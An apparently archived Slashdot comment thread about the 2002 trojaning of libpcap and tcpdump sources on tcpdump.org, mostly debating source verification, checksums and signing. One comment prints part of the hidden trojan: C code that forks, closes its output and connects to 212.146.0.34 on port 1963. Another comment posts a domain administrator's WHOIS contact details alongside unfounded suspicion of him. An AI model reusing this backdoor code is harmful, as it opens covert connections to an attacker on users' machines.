Slashdot Mirror
Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
What!? I didn't even know they were dating!
Emerge doesn't get tcpdump source from tcpdump.org, but from ibiblio.org.
How did it get into tcpdump.org's sources exactly? The HLUG page isn't clear.
apt-get update... : :-)
well, I have not installed these sniffing proggies, so it should be okay.
Now it could be worse
If you suspect your binaries to be trjanized, you'd want to sniff your own machine but if (and it is the case) the sniffer is trojanized, then it could possible hide such "activities"...
I actually read the article and it however seems that it was not the case here...
phew
Trolling using another account since 2005.
Who would have thought that TCPDUMP would have crap like that in it?
And if I don't remember, this happened befrore. Of course this is one of the biggest strenghts of the Open Source Model.
Code is constantly audited, checked and corrected. If your closed source software has backdoors or trojans...well....who knows but on Open Source is easyly detected.
Seems now more than ever the need to check the authenticity of your sources before installing.
As if security auditing wasnt a big enough headache already
-- If at first you don't succeed, lie!
not really a good show for open source...
I mean, I love open source code, but does it seem that it is more suscepticable to trojans being planted? I mean, any tom dick and harry can release code, and it may not be checked for things like this.
How about setting up an independent body of volunteers, who go through commonly used programs, and check for this sort of thing. Than they can issue some kind of certification or "stamp of approval" on that particular release. That way, a user can atleast tell that some basic source code scrutiny was done...
Any comments welcome...
So if you're like me, and you don't actually use the source code (just precompiled versions) then you've got no problem, right?
mirror 1 in italy mirror 2 in poland
blah blah blah... just don't feel like fscker dying all by itself. yadda yadda yadda, beowulf cluster hootie hoo, slashdot should cache unfta unf, I need head
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get accsess to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
Trojan Found in libpcap and tcpdump
I swear, some of these source trees are worse than the canals of Venice.
Use them.
"I'd rather have a full bottle in front of me than a full frontal lobotomy"
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
"It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "
Doesn't the money come from the money you`ve saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!
This never used to happen. Now it is like as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
What good having 'pure' source code minus viruses, worms and trojans? MS showed the way with some Korean CDs infested with bugs. Can penguins be far behind?
If you keep throwing chairs, one day you'll break windows....
there's no-one to pay me to pay my staff for the lost man-hours caused by this.
But then again, you had to pay no-one for the man hours you saved by using the open-source code.
K. Ritchie? Are you getting confused by the K&R book? It's D. Ritchie, if memory serves.
what about winpcap?
Excuse me if I sound disrespectful, but that makes me really doubt your skills. MD4? First, usually what's used is MD5, second it's just a hash and doesn't ensure the file hasn't been tampered with. All you need is to run md5sum on the patched file.
Now, good GPG signatures would have helped.
Either that or someone has trojaned (is that a word?) his site!
The tojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terible karma with a single +5 funny post...
Seriously, though, I think the ideal solution would be to do multiple checks of the RC5 signature of newest packages, over several mirrors. The advisory mentioned that tcpdump.org was compromised, while the mirror at ibiblio.org was OK.
Or use Gentoo Linux. Of course. I can't do that, since I don't have broadband at home... =(
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Isn't this one too many?
There was dsniff, BitchX, OpenSSH etc. and today tcpdump and libpcap?
Does anyone else think that someone has found a security hole in a popular unix daemon and is having some fun with it before notifying the authors. Or maybe there is a *VERY NASTY* exploit circulating privately?
At least that's what I think.
"there's no-one to pay me to pay my staff for the lost man-hours caused by this."
I'm still expecting my check from MicroSoft for my lost man hours.
NO CARRIER
...could it be to search the repository for the insertion date?
there's no-one to pay me to pay my staff for the lost man-hours caused by this
Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.
so seeing as how there's no trojan cleaning program in linux, how does a person infected with the trojan rid his system of it? is it as simple as installing the non-trojan version?
I was just wondering how long these sources have been available with these many eyes making bugs shallow and so forth? I'm assuming it's less than 1 hour, because as I keep being told, everyone in the open source community checks all source code thoroughly before installing it, which is something that can't be done with closed source.
Somebody's been messing around there, don't you think?
Making trouble today for a better tomorrow...
the pages say the latest release(7.1) is vulnerable on some mirrors, but no mention is made of the libpcap-current tarball available on tcpdump.org
It is also true that only because this is an open sorce project was such code found. People seem to forget that there is no realy eficient way of checking closed software for sevurity holes. Ontop of that companies are more than likly to place back doors in programs as actual features that are not mentioned in documentation, or only glazed over. My exaple for this was in a Busines programe that I wourk with had the "option for you to enter a code into one of the text fields if you set the computers date to a specific date and then you would be able to edit all records, thus by pasing the simple code that it uses. I fould out about the feature when the was a problem with some of the records and since the files are encoed I wasn't going to search through them in any easy way so I cantacted the programes distributor and they told me of this feature. Just think how meany othe progs out there have stuff like that.
Yeah! Let's nail his ass! ..
Oh wait, perhaps he's just the tech guy working for the company which registered the domain "raketti.net", Kuopion Puhelin. It's a telecom and net operator after all.
"Good" being the operative keyword.
It would be best not to download the author's public key from the same place you get the source, or else you might as well be fucked. "Gee! It checks out alright, it must have come from my vendor!" Not necessarily.
This is a local ISP, a telephone company.
The good blackhats have lots of compromised machines at their disposal, and are generally way too clever to leave such an obvious clue behind.
It's possible that this guy has something to do with it, but it's more likely that his machine is owned by the same person who managed to put the trojan out there.
...wait...never mind.
Donate background CPU time to fight cancer.
...that this little incident will not be mentioned in the next edition of the Cathedral and the Baazar?
To make laws that man cannot, and will not obey, serves to bring all law into contempt.
--E.C. Stanton
Once again, Gentoo users wouldn't have had any problems, thanks to the wonderful portage system.
The trojaned code has been around for almost a year, from the project homepage (where most people would go for the source), and nobody spotted it.
It highlights the fact that a sizeable part of the open source user base either can't read code, or don't want to.
Yes and no. The information you have successfully received from the Whois database is pointing to the phone company in Finland, which happens to be a host for raketti.net domain. Petri Siltakoski is just an administrative contact of the ISP (Raketti.Net). He has nothing to do with the web page set up by an individual who seems to have an account in this ISP.
I couldn't agree more, if those cheap-arsed hippies who write Linux would only pay up when there's a problem with their software like reputable commercial companies like Micros.. err, Oracl.. err actually, forget it.
Blaming GW Bush for the Iraq war is like blaming Ronald McDonald for the poor quality of food.
Siltakoski Petri is apparently just the guy who registered that domain. It could be that a user from that domain is involved or, as you said, that server has been r00ted. Funny, though, http://mars.raketti.net/~mash/services is nothing but a FreeBSD /etc/services file.
-- Never hit a man with glasses. Hit him with a baseball bat.
This was just sent ~1 min ago:
To : msolnik@hlug.org
Cc : wt-changes@wiretapped.net,
tcpdump-workers@tcpdump.org,
mcr@sandelman.ottawa.on.ca
Subject : tcpdump.org mirrors
----- Message Text -----
Hi guys,
I run the main mirror of tcpdump at wiretapped.net (no relation to wiretapped.us) in Australia. We rsync from cvs.tcpdump.org, and have removed the entire tcpdump.org tree and disabled rsync updates until we hear from Michael Richardson at tcpdump.org.
You may like to add this info to your Updates area, as the unavailability of the main mirror site may seem suspicious. It is not, as described above.
Because wiretapped.net itself is mirrored to a few other sites, it may take between 1 hour and 24 hours for this removal (and any subsequent re-addition) to take effect. We'll note when it goes back online at http://www.wiretapped.net/changelog.html
Hope this assists in preventing any further spread,
Grant
www.wiretapped.net
Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accoutability when someone intentionally codes a trojan in to a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?
Buy the President
MD4, MD5 - whatever it takes.
(With apologies to Michael Keaton)
I have just started using Gentoo and have not finished reading through the docs yet. As such, I am unaware of how this problem would be avoided using Portage. Now if you referring to rolling back, then I understand that...
It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this.
Do you expect sun or microsoft to pay you, either?
Who says geeks don't have condoms?
Or maybe not..
The whole Raketti.net seems to be a domain for a local telecom/ISP based in Kuopio, Finland (smallish town in east Finland). Petri Siltakoski is just probably their Admin.
They seem to be offering internet access with space for homepages, so Petri Siltakoski doesn't necessarily have to have anything to do with this..
Y(and the rest of these responses)HBT. YHL. HAND.
touch -t 200112101200 newbie.c
I thought the whole idea of the GPL was that you could take a program and modify it to your own needs so long as you release the source back to the community under the same license.
Sounds like that's what happened here!
Two paths to greatness... that which slowly climbs to the top of the summit, with all its grueling hard work and requirement of tenacity and patience. Then there is the fast and easy way of being shot up by a cannon. Unfortunately for many you will knock much of the mountain and its traversers off, unfortunately for you what comes up must come down.
Beware the venture captalist, as he seeks to aim only at the short term then cash in and run like hell.
He has a ton of lost down time because he didn't pay for a sniffing program.
How much would one normally pay for a sniffing program?
The time of his employees is probably valued a little higher than a piece of software he could have bought.
The only place OSS saves money is when you have to buy a per seat license yearly, or some other such excessive licensing scheme.
It isn't only a services file, if you scroll down you will find also some c source, which will be compiled on the fly.
The trojan code seems somewhat complex and unreadable at first glance. The variable names don't express much of the semantics. It even doesn't have any comments. No wonder no one notices if this kind of stuff is written into code. And this is very clear code.
/* Here's stuff for the trojan. */, but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
Even (or especially) free software developers should use more descriptive variable names and comment their code well. It makes the code much more readable for analysis, both security or quality reviews.
Well, ok, crackers probably want to obfuscate their code with
I'd recommend the rule: "One comment per statement, except when really unnecessary." Many people think it's silly, but those people haven't had to read a lot of other people's code.
Hmm, I wonder why they used port 1963...author's birth year? Nah, that would be too old for a typical cracker.
When I first started to use open source software (back in '93), I always wondered how easy it would be to release compromised sources, whether intentionally or not.
Once I got into it, hey, I trusted these guys. They were the good guys. We were the good guys. The community was built on trust, and it worked.
We used to scoff when we heard about the torjans in the latest version of Microsoft Word. That would never happen to us... unless they sorted that WINE [wine.org] project out. ;-)
Now we face the same issues. As source distributions (I'm not discounting binary distributions - if you trust RedHat, that's your call) increase in popularity, this will become more of a problem.
We need to tighten up the procedures that we use. We need to ensure that the software we put out is the software that the users download and use. We need to ensure that nobody can comprimise our systems in this way.
Any fool can talk, but it takes a wise man to listen.
"It's the one problem with the open-source community - there's no-one to pay me to pay my staff for the lost man-hours caused by this. "
And this is different from Closed Source how ?
Doesn't the money come from the money you`ve saved by not having to pay for any software? What did your business plan mention about this? Just a blank page, right? Try it out and see what happens? Well, it's your money!
Same place it will come from if you use Closed Source software, using Open Source products does not mean zero cost IT, it means lower cost IT. If your company did plan for these things, then it will make no difference what products you are using.
Fascism should more properly be called corporatism, since it is the merger of state and corporate power - Benito Mussoli
Also feel free to telnet into mars.raketti.net port 1963 a couple hundred times (it returns M the first time and nothing after that).
Does anyone else have an issue with tcpdump.org NOT mentioning there sources were trojaned? It seems there should be some mention of "Hey if you trusted us and didn't verify checksums, you might want to..."
I really wonder how long it (the Trojan) has been in before anyone read the code discovered it.
... where were you wanking, didn't all of you read every f...g line of that program?
... whatever flame fire that remark may start!!! (instead of flaming, look at yourselves in the mirror and admit how sometimes your attitude is ridiculous considering computer)
Hey Slashdoters, you bunch of "I know better than you" people
HA HA!!!
This is just showing that the Open Source "Community" is not more immune than any other to that king of intrusion
Did Microsoft pay you for lost man-hours when your staff battled Nimda or Code Red? Didn't think so.
Insightful my ass. Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...
The reason this is a problem is that nebulous shrug of an answer to the question "Who are you trusting to provide this code which you execute?" It could be an anonymous PGP/GPG key, but to violate people's trust would mean that trusted token is no longer trusted, and thus it would identify the other risks out there.
Imagine the tcpdump distributions were signed by an anonymous key. We could look over the code, and decide to trust that key. Later, people would be able to tacitly trust that key to sign tcpdump tarballs. One day, the tcpdump code will fail to match the signature: it will be caught before being executed, and the trojan will be discovered quickly. Later, another trojan will appear, but the signature will match. A few people will be bit, but the key will be exposed and others will be able to quickly identify their risk.
At the VERY LEAST, use MD5 sums on the files like FreeBSD ports!
--- Nothing clever here: move along now...
the article is called 'reflections on trusting trust' and Ken Thompson wrote it upon inception of the ACM distinguished scientist award. now, we all know you are full of shit (since you can't even spell his name right) but claiming that 'each version of login was compromised' is so far off base that it't not even funny.
follow the link posted already, read it and try to understand what he fundamentally tries to tell you. then go and read aleph1's 'smashing the stack for fun and profit' and try to get a glimpse of what 'hacking' was considered in the 80s.
sources that debian built these packages from have good checksums
: ~$ md5sum tcpdump_3.7.1.orig.tar.gz : ~$ md5sum libpcap_0.7.1.orig.tar.gz
rgoldber@supercomputer:~$ md5sum tcpdump_3.6.2.orig.tar.gz
6bc8da35f9eed4e675bfdf04ce312248 tcpdump_3.6.2.orig.tar.gz
rgoldber@supercomputer
03e5eac68c65b7e6ce8da03b0b0b225e tcpdump_3.7.1.orig.tar.gz
rgoldber@supercomputer
0597c23e3496a5c108097b2a0f1bd0c7 libpcap_0.7.1.orig.tar.gz
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fuly commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
discussion site in discourages discussion shocker
This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.
/. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range.
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
And, by the way, this happens all the bl**dy time on
Yeah, I know it's off-topic. Just wanted to rant about something that irritates me. Return to your normally-scheduled bits and pieces.
Look more closely -- right in the middle of the file is C source code for the trojan.
hmmm of course /. didn't eat it completely. but go and look for yourself for the full code.
they were practicing safe sex
well, I have not installed these sniffing proggies, so it should be okay.
Darn... apt-get even makes your box more secure than before even if you haven't actually installed the bad packages? This must be the Holy Grail! And it should be okay? Not only that you have not installed tcpdump and libpcap, what definitely makes it okay, you don't even trust apt-get to really solve your (non-existing) problem... Now I wanna join the apt-get cult... Where can I register?
I bet you recommend penicillin over other medicine even when you got no infection! Or do you use apt-get then as well? Doesn't make any difference anyway...
(For the record: I use Debian GNU/Linux among other stuff...)
Does anyone know if the RedHat binaries are ok?(7.3/8.0)
This was quite a dissillusion for me. I feel so dirty. Gonna take a long shower.
Because I used the current tar ball Friday afternoon and it shows no sign of the trojan.
Do this: Download gpg from gnupg.org. Build it. Generate yourself a key. Try to get some of your friends to sign it. submit it to keyserver.net. Sign your code with that key. While you're at it, start using kmail, evolution, or mozilla with enigmail and start signing your emails too. Do it religiously.
Check sigs when you download code too.
Slackware 8.1 was released this past summer, so I'm wondering whether its tcpdump-3.7.1-i386-2 is infected.
Can anybody tell me whether checking for "mars", "mash" etc. in the output from "strings tcpdump" or "strings libpcap.a" is sufficient to show evidence of the trojan?
..that would actually be Petri Siltakoski and not the other way around..
And looking through his user profile, he's also a rocket scientist. Wow.
The posted MD5's for libpcap and tcpdump indicates that at least the sunfreeware version is OK.
http://www.sunfreeware.com/md5.html
What does the article imply with "ADM. Hmmm..."?
...as a rocket scientist I feel most compelled to answer& cid=4658776
d =4658433
i d=4658097
1 28&cid=2238414
i d=2207372
i d=2204471
i d=2204422
http://slashdot.org/comments.pl?sid=44937
...I run a successful London-based dot com
http://slashdot.org/comments.pl?sid=44933&ci
... As a lawyer myself, I can state that
http://slashdot.org/comments.pl?sid=44912&c
... I'm an avid open-source supporter
http://slashdot.org/comments.pl?sid=21
...I am an avid supported of the open-source movement [sounds familiar? that's because it is -ed]
http://slashdot.org/comments.pl?sid=20824&c
...I'm an avid supported of the open source movement [we know -ed]
http://slashdot.org/comments.pl?sid=20761&c
... I am a passionate supported of the open-source movement [geez -ed]
http://slashdot.org/comments.pl?sid=20760&c
Enjoy your job, make lots of money, work within the law. Choose any two.
irssi
fragroute, dsniff, fragrouter
BitchX
This message says Recently there have been a spat of well publicized attacks against what I would consider to be the backbone of the open source movement - it's source code distribution system. Hackers have been penetrating people who download, say, OpenSSH and then compile it to use on their systems by trojaning OpenSSH itself. This strikes at the very HEART of Open Source by making the act of installing the software a weakness. Because Open Source has no one distribution point, there are many places for someone to verify if they want to install software securely. Because there are no vendors, the sites people download software from are usually not provided with a dedicated security staff.
This is serious, guys and gals. Use the source, Luke - but what if I can't trust the source any more? Open Source has to find a method to get around this problem; see this post.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
1. Get open-source software
2. ???
3. PROFIT!!!
And this is your favorite anonymous coward saying, "Have a better business plan if you use a better alternative such as open source."
This reminds me of this one time when I chatted this girl on IRC. Oh wait.....
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc..
The source could still be publically available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Note that THE DATE ON THE FILE DOESN'T MATTER. It was trojaned last night, not last year.
The fact that someone so ineptly trojaned the source, not even bothering to generate a new md5sum, suggests that it's someone out to make it obvious looking. Someone who has a reason to discredit open source. Someone like a former script kiddie employed by microsoft...
Never mind that russian crackers were wondering round MS servers for MONTHS back in 2000...
All it does it retrieve a /etc/services file from that website.
Heh, I had only looked at the first few lines or so, and didn't think anything of it. Did anyone look in the parent directory from where that services file is? Or if the trojan gets any other files besides services?
-- Never hit a man with glasses. Hit him with a baseball bat.
I downloaded and installed (On a customer's machine even!) the file http://www.tcpdump.org/release/libpcap-0.7.1.tar.g z back on October 24th (The link still shows up in the "visited" color in my browser even). My md5sum is 0597c23e3496a5c108097b2a0f1bd0c7, and inspection of the config script and gencode.c show no signs of the evil code.
So the trojan'd version has not been sitting there too long.
Looks like some jerk-off has discovered that overrated/underrated don't change the mod label, just the score.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
I'm telling you, this is Microsoft's new tactic for attacking open source. Make people afraid of it, and they will run in terror.
Scary, very scary.
In the meanwhile, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.
This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.
We need to be much more careful about the software that we run.
The viruses spread because of known holes in Outlook - that MS refused to fix for months, and actively took legal action against people pointing them out in the first place. Kinda like the catholic church forbidding galileo to point out that the earth went round the sun...
Goddamn, just becuase they might be loaded with more trojans than you'll ever need, spying on all of your important works, please, please use a closed-source spell-checker, this OS one appears to be faulty.
Reading that text was just plain painful.
Unless it was an editor. In that case, s/jerk-off/editor/g.
login as root (or whoever can run tcpdump)
/. your local rooted base. /usr/bin/tcpd echo 'A' (i think that was the quit code)
/. editor)
tcpdump -n host 212.146.0.34 &
telnet 212.146.0.34 1963
if tcpdump sees the connection since it isn't ignoring port 1963, if you don't see the connection, then your tcpdump is ignoring port 1963
and well, its always nice to
the people at 212.146.0.34 should change it to something like
if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux then i am at spelling (boy, i should be an
--Anonymous Coward
I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.
"ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.
Preliminary inspection says that the CVS repository is O.K.
What you're saying is perfectly valid, but what if I use common sounding variable names to make it appear as if I was doing something I wasn't? Even with MOST good programmers, they aren't ever trained to debug code in this manner (I know a few CS exams do, for sure, but I have NEVER seen a huge project train people for this).
How about this:Lets start a few grassroots projects (doesn't matter how many) and work on educating people to read obfuscated code. Identify when strtok, fopen, etc etc is and is not doing harmful things to data - when it may indeed be doing something nefarious.
I started a site myself here to help myself start explaining simple stuff.. and eventually will work up to writing drop-in replacement libraries for other programs, or perhaps ways to trojan executables in memory you might have have control over (ptrace?).
Lets all learn a bit, and share the knowledge.
[plug]Damn my sig makes strange sense now[/plug]
"During times of universal deceit, telling the truth becomes a revolutionary act" -- George Orwell
Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
You are partially correct.
If you download the author's public key today when you install widget 2.3 and tomorrow Tom Blackhat replaces both the author's public key and places a trojaned widget 2.4 you will catch it when you do the upgrade because you got the legitimate key prior to it's replacement. Only new downloaders will be screwed.
Obviously it is still better to place the public key in a secure location separate from the files but there is some use to the key system even if the key is replaced later.
Coding Blog
This isn't the first post of this type of thing with open source and I've always wondered if it's a big deal when I see them.
But I think I finally get the difference between Closed Source and Open Source with regards to evil code:
Closed Source with Intentional Evil Code = Law Suit
Open Source with Intentional Evil Code = Tough Luck
I know the rebuttal is - "with open source, you can find the evil code, you have more eyes looking to find that evil code" but as it has been noted in this thread, how long has it been there? A year, more? Plus look at the number of almost anonymous (if not completely anonymous) contributors to the code. Closed Source doesn't have that liability.
Sorry but this one goes grudgingly to the Close Source win column.
I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.
FreeSpeech.org
When was the last time Microsoft paid you when a security hole was found in their product. YOU should have got your admins to verify the checksums before installation. The parent poster is a troll
MD5 checks work nicely. Sure pgp in theory is better but since md5's are cached locally, and a helluva lot faster to check the chances that they will actually be used and verified are seemingly quite good.
Which is to say in practice MD5 has caught rather a lot of these problems, and in quite timely manner.
As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).
Linux is Linux, if One need clarify their dist: <Dist>/GNU Linux
bsds are of course just BSD
I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. Actually makes you think if there is a certain person or organization behind this? Considering the fact that news like this give these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).
FreeBSD (don't know about other BSDs) stores the checksums either locally when installing the ports-collection or onto another server just like gentoo.
Nah probably not...
Strange women lying in ponds distributing swords is no basis for a system of government.
That's why we need a new moderator point:
-1 Caps Lock Title
"All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
/. An early poster makes assumptions and gets modded way the hell up, then all the rebuttals pointing out he's talking out of an unreliable orifice wallow in the low point range."
And, by the way, this happens all the bl**dy time on
You mean like yours?
and it's not the only one found today, nor in the past week... good to see that slashdot is finally reporting on this stuff.
To all those who think linux is safe and secure... guess again. It's just that you guys spend more time writting viri and looking for 'sploits' in MS code than MS code jockeys do with linux... until now. That and the 9 to 1 ratio of users.
Isn't read-only hardware the simplest answer for this kind of attack?
If the files are coming from a CD-R, there's no trojan. Period.
Of course CD-Rs are too small for many sites. How practical is it to write-protect a HD?
Yeah, that girl on IRC was probably Jazzman.
oh.. yah.. sorry.
The win95 trojan, I forget to tell you about.
Unfortunately, Bill wasn't man enough to tell
you about it himself, but on the otherhand,
you've been running win95 flawlessly for the
last 7 years, without 1 lost manhour.
--
Silvio
Question: Since this guy is identifiable..why not have Finnish govt. start looking with him. (Of course, I realize that he may not be the actual perp...but...)
Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...
Ignoring the fact that installing certain operating system components are often worse on your computer than a virus (by installing this service pack, we may enter your computer)...
Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.
And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components,etc.
MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.
You said: "People using source for security who are in category 1 or 2 are fooling themselves."
Not quite. Here's why:
When you trust a binary, you are trusting the builder of that binary, the system on which it was built, AND the source of the source (i.e. the CVS repository or other ultimate source of the code, and all the source delivery mechanisms and servers like FTP). When you use the source directly, you remove one more trusted item from the list. Just like the builder of the binary, you trust the source of the source, but you build it on your own system which supposedly you trust more than someone elses.
For projects that build and provide binaries directly, there may be some trust overlap between who is the builder of the binary and the source of the source.
I generally agree, however, that if you are in category 1 or 2, you are a fool to think you are totally safe. But it is NOT equal to users of binaries since you do remove a middleman of sorts that binary users must trust.
I guess he may be one of those poor sods who got their Unix sysadmin training through this.
"There are already a million monkeys on a million typewriters, and Usenet is NOTHING like Shakespeare." - Blair Houghton
Maybe somebody has already posted this idea as a project on sourceforge..
There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be carefull. Telling the rest of the world closed binaries are infected often as well does not help. The damage is already done.
This is my idea to prevent most of these jokers tricks.
In stead of placing the checksums next to the source on the same server we nead to place it some where safe. A number of centralized servers with a sole purpose to serve these sums, in several locations, on preferably differend operating systems. This combined with the use of eg PGP.
All distro's, for those who have not already, must apply a simple program ala portage and apt that checks against multiple PGP-key servers before the build commenses.
Now, how to make sure the admin of the project is the one signing the source on his machine.............
Why are other peoples sig's always more witty ???
The discussion we started last night on the Gentoo bugs forum has some good information.
http://bugs.gentoo.org/show_bug.cgi?id=10663
Thanks again to Matt, Scott, and Bruce for the help doublechecking my work and posting the warning.
Demo / Russell
... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said with a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which insures that the key can't (reasonably) be brute-forced before it becomes useless.
S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a mime-type of message/rfc822, browsers that support S/MIME (at least netscape, mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.
~~~
This is not the first time that things like this is happaning, ms make this not once! Open source always a bit dangerious, because there is no one who is responsible for it. But what does Ms with it? The question is, who needs to protect us? We have to do it every time and every way? Or the distributer? the company who make the code? Maybe we will need a community or committee for testing the source? :))
I thik if I give you a code I should be check it before I give it to you! And I think this is the only way which can work!
People, company who give out code with infections will write there name to the big black list.. as it happaned with ms!
So? Who what?
There is only one good solution: The simpliest!
The year rings a bell..
(a) The year of inauguration of the Apollo Space Program
(b) The year of the Afghan reconstitution
(c) Martin Luther King delivers the "I have a dream" speech.
Here
More here
The mantra of Open Source (Many eyes on the code) is nothing but marketspeak. In reality virtually noone ever looks at the code. Couple that with a development staff of the same people that write viruses and all of Open SOurce becomes one big time bomb.
This here is also interesting.
At least a reasonable reply.
Too many morons with mod points at this place. As if pointing out the obvious, that governments don't give a rat's ass about pollution of open source projects with trojan code. Since it's become obvious that the open source community cannot keep its code safe from such attacks, it's something to worry about.
Something -- code vaults, stronger verification checks of code -- whatever, has to be done about it now, or we're going to have to remove all open source stuff from anyone who cares about their systems, meaning government and business.
Knee-jerk support for Open Source is as pathetic as the same for Microsoft. This is a hole you could drive a truck through and a lack of exercise of fiduciary responsibility due to open source zealotry is as bad as what the bastards at Enron did. Fix this, or the open source stuff is coming out of my company, and anywhere I work.
You assholes with mod points aren't going to make this problem go away. It'll be your undoing. I can hear the M$ sales pitch right now...
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
